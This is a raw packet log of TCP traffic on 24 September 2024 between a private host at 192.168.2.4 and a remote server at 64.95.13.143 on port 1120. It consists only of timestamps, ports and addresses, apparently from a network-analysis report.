Sep 24, 2024 17:46:12.504029989 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.504038095 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.504080057 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.504144907 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.504151106 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.504189968 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.564888954 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.564914942 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.564938068 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.564976931 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.565037966 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.565057993 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.565072060 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.565084934 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.565099001 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.565144062 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.587667942 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.587676048 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.587682962 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.587723017 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.587753057 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.587920904 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.587934017 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.587945938 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.587960005 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.587969065 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.587997913 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.592222929 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.592281103 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.592328072 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.592358112 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.592371941 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.592386007 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.592398882 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.592413902 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.592442036 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.592732906 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.593090057 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.593112946 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.593127012 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.593135118 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.593168020 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.593242884 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.593255997 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.593269110 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.593282938 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.593293905 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.593318939 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.593533993 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.593657970 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.593671083 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.593684912 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.593694925 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.593705893 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.593723059 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.593734980 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.593749046 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.593760967 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.593780994 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.593787909 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.593807936 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.594136953 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.594151020 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.594178915 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.594214916 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.594228029 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.594240904 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.594249964 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.594261885 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.594276905 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.594281912 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.594297886 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.594321966 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.594722986 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.594736099 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.594748974 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.594760895 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.594772100 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.594784975 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.594791889 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.594800949 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.594820023 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.594831944 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.594845057 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.594857931 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.594870090 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.594881058 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.594897032 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.594903946 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.594916105 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.594929934 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.594940901 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.594975948 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.595487118 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.595499992 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.595513105 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.595526934 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.595536947 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.595549107 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.595560074 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.595568895 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.595582962 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.595594883 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.595614910 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.595626116 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.595642090 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.595653057 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.595674992 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.595686913 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.595699072 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.595710039 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.595721960 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.595731020 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.595743895 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.595758915 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.595777988 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.595789909 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.595799923 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.595810890 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.595824003 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.595829964 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.595838070 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.595897913 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.596473932 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.596493006 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.596503973 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.596514940 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.596527100 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.596538067 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.596546888 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.596559048 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.596571922 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.596585035 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.596594095 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.596610069 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.596621990 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.596638918 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.596651077 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.596658945 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.596669912 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.596685886 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.596690893 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.596705914 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.596718073 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.596728086 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.596754074 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.597296000 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.597310066 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.597323895 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.597337961 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.597349882 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.597362995 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.597373962 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.597383022 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.597395897 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.597419977 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.597592115 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.597604990 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.597618103 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.597626925 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.597651005 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.597659111 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.597670078 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.597682953 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.597700119 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.597707987 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.597735882 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.598467112 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.598547935 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.598561049 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.598588943 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.598786116 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.598798037 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.598826885 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.598917961 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.598931074 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.598957062 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.599185944 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.599196911 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.599227905 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.654412985 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.657253981 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.657269001 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.657283068 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.657336950 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.657416105 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.657428980 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.657444000 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.657453060 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.657464027 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.657485962 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.657613039 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.657651901 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.680530071 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.680546999 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.680561066 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.680584908 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.680598974 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.680610895 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.680624008 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.680638075 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.680665016 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.686045885 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.686059952 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.686072111 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.686098099 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.686121941 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.686145067 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.686158895 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.686172009 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.686186075 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.686204910 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.686237097 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.686467886 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.686480045 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.686496019 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.686510086 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.686517000 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.686533928 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.686542988 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.686552048 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.686567068 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.686579943 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.686589956 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.686608076 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.686619997 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.686939955 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.686953068 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.686970949 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.686980963 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.686991930 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.687006950 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.687017918 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.687047958 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.687210083 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.687222004 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.687236071 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.687247992 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.687262058 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.687271118 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.687283039 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.687294960 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.687303066 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.687311888 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.687324047 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.687336922 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.687350035 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.687360048 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.687376976 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.687391996 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.687652111 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.687664032 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.687707901 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.687727928 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.687741041 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.687752008 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.687760115 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.687769890 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.687788010 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.687794924 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.687820911 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.688112974 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.688126087 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.688139915 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.688153982 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.688163996 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.688175917 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.688188076 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.688199043 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.688215017 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.688225985 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.688235044 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.688246965 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.688261032 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.688270092 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.688282013 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.688294888 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.688311100 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.688324928 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.688332081 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.688342094 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.688354015 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.688366890 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.688376904 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.688390970 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.688400984 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.688410997 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.688426018 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.688438892 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.688447952 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.688472033 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.689007044 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.689019918 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.689033031 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.689045906 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.689059019 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.689068079 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.689085960 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.689094067 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.689104080 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.689119101 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.689126015 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.689135075 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.689156055 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.689162016 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.689172983 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.689183950 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.689193010 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.689208984 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.689225912 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.689232111 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.689243078 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.689263105 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.689467907 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.689480066 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.689491987 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.689546108 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.689546108 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.689587116 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.689604044 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.689615965 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.689630985 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.689640999 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.689652920 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.689662933 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.689673901 CEST	1120	49730	64.95.13.143	192.168.2.4
